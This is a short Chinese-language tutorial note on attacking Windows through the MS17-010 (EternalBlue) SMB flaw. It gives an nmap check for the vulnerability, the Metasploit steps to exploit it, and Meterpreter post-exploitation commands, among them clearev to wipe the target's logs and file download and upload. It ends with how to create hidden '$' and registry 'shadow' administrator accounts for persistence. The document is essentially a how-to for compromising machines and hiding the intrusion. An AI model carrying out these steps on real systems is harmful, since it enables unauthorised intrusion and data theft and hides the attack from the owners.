MS17-010永恒之蓝是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。永恒之蓝是Windows 的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
SMB 协议基础 定义:客户机/服务器架构的请求/响应协议,主要⽤于⽂件共享、打印机共享、⽹络登录等 关联端⼝:TCP 139 端⼝(NetBIOS 会话端⼝)、TCP 445 端⼝(SMB 直接连接端⼝) ⽇常应⽤:Windows 系统"⽹上邻居"功能的底层依赖协议
nmap -sV -p445 --script=smb-vuln-ms17-010 192.168.20.142
攻击流程: ①msfconsole ②search ms17-010 #查找模块 ③use 模块序号 ④show options #设置选项 ⑤set rhosts xxx.xxx.xxx.xxx ⑥run开始攻击
Meterpreter 核心操作(常用命令) ps,查看目标机所有运行进程 screenshot,截取目标机当前屏幕(图片保存至Kali本地) shell,获取目标机CMD命令行(输入chcp 65001解决中文乱码) clearev,清除目标机系统日志(掩盖攻击痕迹) getuid,查看当前获取的用户权限 download ,目标文件路径 本地保存路径下载目标机文件到Kali upload ,本地文件路径 目标机保存路径上传 Kali 文件到目标机
核心管理命令(CMD 命令行) net user net user 用户名 net user 用户名 密码 /add net user 用户名 /delete net localgroup 组名 用户名 /add
net user gaga美元符号💲 123456 /add
⽤户名后加美元符号💲,默认不在"计算机管理"和 net user 列表中显示
regedit注册表编辑器 创建影子用户
